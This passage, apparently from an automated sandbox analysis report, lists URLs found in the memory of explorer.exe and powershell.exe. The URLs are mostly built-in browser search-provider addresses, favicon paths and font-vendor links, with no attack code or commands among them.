Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
